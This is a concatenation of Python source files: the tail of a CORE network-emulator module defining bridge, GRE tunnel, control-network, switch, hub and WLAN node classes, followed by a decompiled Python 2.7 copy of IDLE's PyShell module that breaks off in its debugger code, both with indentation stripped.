(that were linked using linknet()).
:param net: interface to get link for
:return: interface the provided network is linked to
"""
for iface in self.get_ifaces():
if iface.othernet == net:
return iface
return None
def add_ips(self, ips: List[str]) -> None:
"""
Add ip addresses on the bridge in the format "10.0.0.1/24".
:param ips: ip address to add
:return: nothing
"""
if not self.up:
return
for ip in ips:
self.net_client.create_address(self.brname, ip)
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: NetworkPolicy = NetworkPolicy.ACCEPT,
localip: str = None,
ttl: int = 255,
key: int = None,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param server: remote server node
will run on, default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, server, policy)
if key is None:
key = self.session.id ^ self.id
self.grekey: int = key
self.localnum: Optional[int] = None
self.remotenum: Optional[int] = None
self.remoteip: Optional[str] = remoteip
self.localip: Optional[str] = localip
self.ttl: int = ttl
self.gretap: Optional[GreTap] = None
if self.remoteip is not None:
self.gretap = GreTap(
session,
remoteip,
key=self.grekey,
node=self,
localip=localip,
ttl=ttl,
mtu=self.mtu,
)
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.gretap.startup()
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def add_ips(self, ips: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param ips: address list
:return: nothing
"""
if self.gretap:
raise CoreError(f"gretap already exists for {self.name}")
remoteip = ips[0].split("/")[0]
localip = None
if len(ips) > 1:
localip = ips[1].split("/")[0]
self.gretap = GreTap(
self.session,
remoteip,
key=self.grekey,
localip=localip,
ttl=self.ttl,
mtu=self.mtu,
)
self.startup()
self.attach(self.gretap)
def setkey(self, key: int, iface_data: InterfaceData) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:param iface_data: interface data for setting up tunnel key
:return: nothing
"""
self.grekey = key
ips = iface_data.get_ips()
if ips:
self.add_ips(ips)
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
# base control interface index
CTRLIF_IDX_BASE: int = 99
DEFAULT_PREFIX_LIST: List[str] = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
prefix: str,
_id: int = None,
name: str = None,
hostid: int = None,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: str = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
:param name: node namee
:param prefix: control network ipv4 prefix
:param hostid: host id
:param server: remote server node
will run on, default is None for localhost
:param assign_address: assigned address
:param updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix: netaddr.IPNetwork = netaddr.IPNetwork(prefix).cidr
self.hostid: Optional[int] = hostid
self.assign_address: bool = assign_address
self.updown_script: Optional[str] = updown_script
self.serverintf: Optional[str] = serverintf
super().__init__(session, _id, name, server)
def add_addresses(self, index: int) -> None:
"""
Add addresses used for created control networks,
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.use_ovs()
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logger.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logger.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.set_iface_master(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_iface(self.brname, self.serverintf)
except CoreCommandError:
logger.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logger.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logger.exception("error issuing shutdown script shutdown")
super().shutdown()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param iface: network interface
:return: nothing
"""
if len(self.ifaces) >= 2:
raise CoreError("ptp links support at most 2 network interfaces")
super().attach(iface)
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self.ifaces) != 2:
return all_links
ifaces = self.get_ifaces()
iface1 = ifaces[0]
iface2 = ifaces[1]
unidirectional = 0 if iface1.local_options == iface2.local_options else 1
iface1_data = iface1.get_data()
iface2_data = iface2.get_data()
link_data = LinkData(
message_type=flags,
type=self.linktype,
node1_id=iface1.node.id,
node2_id=iface2.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=iface1.local_options,
)
link_data.options.unidirectional = unidirectional
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
link_data = LinkData(
message_type=MessageFlags.NONE,
type=self.linktype,
node1_id=iface2.node.id,
node2_id=iface1.node.id,
iface1=InterfaceData(id=iface2_data.id),
iface2=InterfaceData(id=iface1_data.id),
options=iface2.local_options,
)
link_data.options.unidirectional = unidirectional
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.SWITCH
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype: NodeTypes = NodeTypes.HUB
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "hub"
def startup(self) -> None:
"""
Startup for a hub node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.set_mac_learning(self.brname, LEARNING_DISABLED)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.WIRELESS_LAN
linktype: LinkTypes = LinkTypes.WIRED
policy: NetworkPolicy = NetworkPolicy.DROP
type: str = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param server: remote server node
will run on, default is None for localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model: Optional[WirelessModel] = None
self.mobility: Optional[WayPointMobility] = None
def startup(self) -> None:
"""
Startup for a wlan node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
nft_queue.update(self)
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface
:return: nothing
"""
super().attach(iface)
if self.model:
iface.poshook = self.model.position_callback
iface.setposition()
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logger.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS:
self.model = model(session=self.session, _id=self.id)
for iface in self.get_ifaces():
iface.poshook = self.model.position_callback
iface.setposition()
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise CoreError(f"no mobility set to update for node({self.name})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise CoreError(f"no model set to update for node({self.name})")
logger.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for iface in self.get_ifaces():
iface.setposition()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
links = super().links(flags)
if self.model:
links.extend(self.model.links(flags))
return links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype: NodeTypes = NodeTypes.TUNNEL
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "tunnel"
|
PyShell.py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: PyShell.py
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print >> sys.__stderr__, "** IDLE can't import Tkinter. Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + '_'
HOST = '127.0.0.1'
PORT = 0
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno, file=None, line=None):
global warning_stream
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno, file=file, line=line))
except IOError:
pass
return
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = '\nWarning (from warnings module):\n'
s += ' File "%s", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += ' %s\n' % line
s += '%s: %s\n>>> ' % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None, orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"""Regular text edit window in IDLE, supports breakpoints"""
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind('<<set-breakpoint-here>>', self.set_breakpoint_here)
self.text.bind('<<clear-breakpoint-here>>', self.clear_breakpoint_here)
self.text.bind('<<open-python-shell>>', self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(), 'breakpoints.lst')
if self.io.filename:
self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook, self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
('Set Breakpoint', '<<set-breakpoint-here>>'),
('Clear Breakpoint', '<<clear-breakpoint-here>>')]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add('BREAK', '%d.0' % lineno, '%d.0' % (lineno + 1))
try:
i = self.breakpoints.index(lineno)
except ValueError:
self.breakpoints.append(lineno)
try:
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except:
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index('insert')))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index('insert')))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove('BREAK', 'insert linestart', 'insert lineend +1char')
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove('BREAK', '1.0', END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"""Save breakpoints when file is saved"""
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath, 'r').readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath, 'w')
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update()
filename = self.io.filename
if filename is None:
return
else:
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath, 'r').readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename) + 1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
return
def update_breakpoints(self):
"""Retrieves all the breakpoints in the current window"""
text = self.text
ranges = text.tag_ranges('BREAK')
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index + 1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
def _close(self):
"""Extend base method - clear breaks when module is closed"""
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"""Extend base class: IDLE supports a shell and breakpoints"""
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"""Extend base class: colorizer for the shell window itself"""
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove('TODO', '1.0', 'iomark')
self.tag_add('SYNC', '1.0', 'iomark')
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main', 'Theme', 'name')
self.tagdefs.update({'stdin': {'background': None,'foreground': None},'stdout': idleConf.GetHighlight(theme, 'stdout'),
'stderr': idleConf.GetHighlight(theme, 'stderr'),
'console': idleConf.GetHighlight(theme, 'console')
})
return
class ModifiedUndoDelegator(UndoDelegator):
"""Extend base class: forbid insert/delete before the I/O mark"""
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, '<', 'iomark'):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, '<', 'iomark'):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"""Override the base class - just re-raise EOFError"""
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
return
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
return
def build_subprocess_arglist(self):
w = [ '-W' + s for s in sys.warnoptions ]
if 1 / 2 > 0:
w.append('-Qnew')
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc', default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ['-c', command, str(self.port)]
def start_subprocess(self):
addr = (
HOST, self.port)
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error as err:
pass
else:
self.display_port_binding_error()
return None
self.port = self.rpcclt.listening_sock.getsockname()[1]
if PORT != 0:
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.rpcclt.register('stdin', self.tkconsole)
self.rpcclt.register('stdout', self.tkconsole.stdout)
self.rpcclt.register('stderr', self.tkconsole.stderr)
self.rpcclt.register('flist', self.tkconsole.flist)
self.rpcclt.register('linecache', linecache)
self.rpcclt.register('interp', self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
else:
self.restarting = True
debug = self.getdebugger()
if debug:
try:
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.transfer_path()
console.text.delete('iomark', 'end-1c')
if was_executing:
console.write('\n')
console.showprompt()
halfbar = (int(console.width) - 16) // 2 * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set('restart', 'end-1c')
console.text.mark_gravity('restart', 'left')
console.showprompt()
if debug:
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall('exec', 'interrupt_the_server', (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError:
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
return
def unix_terminate(self):
"""UNIX: make sure subprocess is terminated and collect status"""
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
return
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand('if 1:\n import sys as _sys\n _sys.path = %r\n del _sys\n \n' % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
else:
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == 'OK':
if what is not None:
print >> console, repr(what)
elif how == 'EXCEPTION':
if self.tkconsole.getvar('<<toggle-jit-stack-viewer>>'):
self.remote_stack_viewer()
elif how == 'ERROR':
errmsg = 'PyShell.ModifiedInterpreter: Subprocess ERROR:\n'
print >> sys.__stderr__, errmsg, what
print >> console, errmsg, what
try:
self.tkconsole.endexecuting()
except AttributeError:
pass
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval, self.poll_subprocess)
return
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue('exec', 'stackviewer', ('flist', ), {})
if oid is None:
self.tkconsole.root.bell()
return
else:
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main', 'Theme', 'name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill='both')
node = TreeNode(sc.canvas, None, item)
node.expand()
return
gid = 0
def execsource(self, source):
"""Like runsource() but assumes complete exec source"""
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"""Execute an existing file"""
if source is None:
source = open(filename, 'r').read()
try:
code = compile(source, filename, 'exec')
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print >> tkerr, '*** Error in script or command!\n'
print >> tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
return
def runsource(self, source):
"""Extend base class method: Stuff the source in the line cache first"""
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action='error', category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write('Unsupported characters in input\n')
return
try:
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
return
def stuffsource(self, source):
"""Stuff source in the filename cache"""
filename = '<pyshell#%d>' % self.gid
self.gid = self.gid + 1
lines = source.split('\n')
linecache.cache[filename] = (len(source) + 1, 0, lines, filename)
return filename
def prepend_syspath(self, filename):
"""Prepend sys.path with file's directory if not already included"""
self.runcommand('if 1:\n _filename = %r\n import sys as _sys\n from os.path import dirname as _dirname\n _dir = _dirname(_filename)\n if not _dir in _sys.path:\n _sys.path.insert(0, _dir)\n del _filename, _sys, _dirname, _dir\n \n' % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = 'iomark + %d chars' % (offset - 1)
else:
pos = 'iomark linestart + %d lines + %d chars' % (
lineno - 1, offset - 1)
text.tag_add('ERROR', pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add('ERROR', pos + ' wordstart', pos)
self.tkconsole.resetoutput()
self.write('SyntaxError: %s\n' % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return (msg, lineno, offset, line)
else:
return None
return None
def showtraceback(self):
"""Extend base class method to reset output properly"""
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar('<<toggle-jit-stack-viewer>>'):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != '<>':
del c[key]
def runcommand(self, code):
"""Run the code without invoking the debugger"""
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue('exec', 'runcode', (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"""Override base class method"""
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue('exec', 'runcode', (
code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno('Exit?', 'Do you want to exit altogether?', default='yes', master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >> self.tkconsole.stderr, 'IDLE internal error in runcode()'
self.showtraceback()
self.tkconsole.endexecuting()
elif self.tkconsole.canceled:
self.tkconsole.canceled = False
print >> self.tkconsole.stderr, 'KeyboardInterrupt'
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError:
pass
return
def write(self, s):
"""Override base class method"""
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror('Port Binding Error', "IDLE can't bind to a TCP/IP port, which is necessary to communicate with its Python execution server. This might be because no networking is installed on this computer. Run IDLE with the -n command line switch to start without a subprocess and refer to Help/IDLE Help 'Running without a subprocess' for further details.", master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror('Subprocess Startup Error', "IDLE's subprocess didn't make connection. Either IDLE can't start a subprocess or personal firewall software is blocking the connection.", master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror('Already executing', 'The Python Shell window is already executing a command; please wait until it is finished.', master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = 'Python Shell'
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
menu_specs = [
('file', '_File'),
('edit', '_Edit'),
('debug', '_Debug'),
('options', '_Options'),
('windows', '_Windows'),
('help', '_Help')]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ('windows', '_Window')
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != 'shell':
ms.insert(2, ('shell', 'She_ll'))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
self.indentwidth = 8
self.context_use_ps1 = True
text = self.text
text.configure(wrap='char')
text.bind('<<newline-and-indent>>', self.enter_callback)
text.bind('<<plain-newline-and-indent>>', self.linefeed_callback)
text.bind('<<interrupt-execution>>', self.cancel_callback)
text.bind('<<end-of-file>>', self.eof_callback)
text.bind('<<open-stack-viewer>>', self.open_stack_viewer)
text.bind('<<toggle-debugger>>', self.toggle_debugger)
text.bind('<<toggle-jit-stack-viewer>>', self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind('<<view-restart>>', self.view_restart_mark)
text.bind('<<restart-shell>>', self.restart_shell)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdout = PseudoFile(self, 'stdout', IOBinding.encoding)
self.stderr = PseudoFile(self, 'stderr', IOBinding.encoding)
self.console = PseudoFile(self, 'console', IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
self.history = self.History(self.text)
self.pollinterval = 50
return
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now", 'You can only toggle the debugger when idle', master=self.text)
self.set_debugger_indicator()
return 'break'
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar('<<toggle-debugger>>', not not db)
def toggle_jit_stack_viewer(self, event=None):
pass
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write('[DEBUG OFF]\n')
sys.ps1 = '>>> '
self.showprompt()
self.set_debugger_indicator()
return
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt, self)
else:
dbg_gui = Debugger.Debugger(self)
